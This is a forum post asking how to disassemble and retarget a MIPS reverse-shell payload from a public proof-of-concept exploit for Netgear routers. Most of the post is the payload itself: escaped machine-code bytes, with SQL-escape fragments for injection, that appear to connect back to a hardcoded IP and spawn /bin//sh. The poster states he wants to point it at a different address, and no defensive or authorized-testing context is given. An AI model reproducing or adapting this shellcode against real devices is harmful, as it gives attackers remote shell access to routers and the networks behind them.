NASM - The Netwide Assembler
NASM Forum => Using NASM => Topic started by: mpmackenna on April 09, 2013, 04:03:16 PM
-
I am attempting to edit a reverse shell that was coded by Zach Cutlip for an exploit he wrote for SOHO routers. Here is a link to his source code project.
https://github.com/zcutlip/exploit-poc/tree/master/netgear/wndr3700v3 (https://github.com/zcutlip/exploit-poc/tree/master/netgear/wndr3700v3)
His reverse shell that is written in Python appears to contain what I believe is machine code for a MIPS based piece of hardware. The reverse shell specifies a reverse IP. I would like to learn how to reverse his machine code so that I can recreate the shell and have it refer to a different reverse IP.
I looked through the documentation but everything seemed to point to compiling assembly to make machine code not the other way around. Can someone please point me in the right direction?
Thanks,
Mike
connect_back=["\xfd\xff\x0f\x24\x27",
"x'20'", #SQL escape
"\xe0\x01\x27\x28\xe0\x01\xff\xff\x06\x28",
"\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f",
"\xfd\xff\x0f\x24\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x7a\x69\x0e\x3c",
"\x7a\x69\xce\x35\xe4\xff\xae\xaf\x0a\x0a",
"x'0d'", #SQL escape
"\x3c\x0a\x0a\xad\x35",
"\xe6\xff\xad\xaf\xe2\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01",
"\x4a\x10\x02\x24\x0c\x01\x01\x01\xfd\xff\x0f\x24\x27\x28\xe0\x01",
"\xff\xff\xa4\x8f\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\xa5",
"x'20'", #SQL escape
"\xff\xff\x01\x24\xfb\xff\xa1\x14\xff\xff\x06\x28\x62\x69\x0f\x3c",
"\x2f\x2f\xef\x35\xf4\xff\xaf\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35",
"\xf8\xff\xae\xaf\xfc\xff\xa0\xaf\xf4\xff\xa4\x27\xd8\xff\xa4\xaf",
"\xff\xff\x05\x28\xdc\xff\xa5\xaf\xd8\xff\xa5\x27\xab\x0f\x02\x24",
"\x0c\x01\x01\x01\xff\xff\x06\x28"]
Update: I have converted the machine code in to MIPS assembly language using http://acade.au7.de/disasmips/disasmips.htm
Now I just need to learn how to read MIPS Assembly language....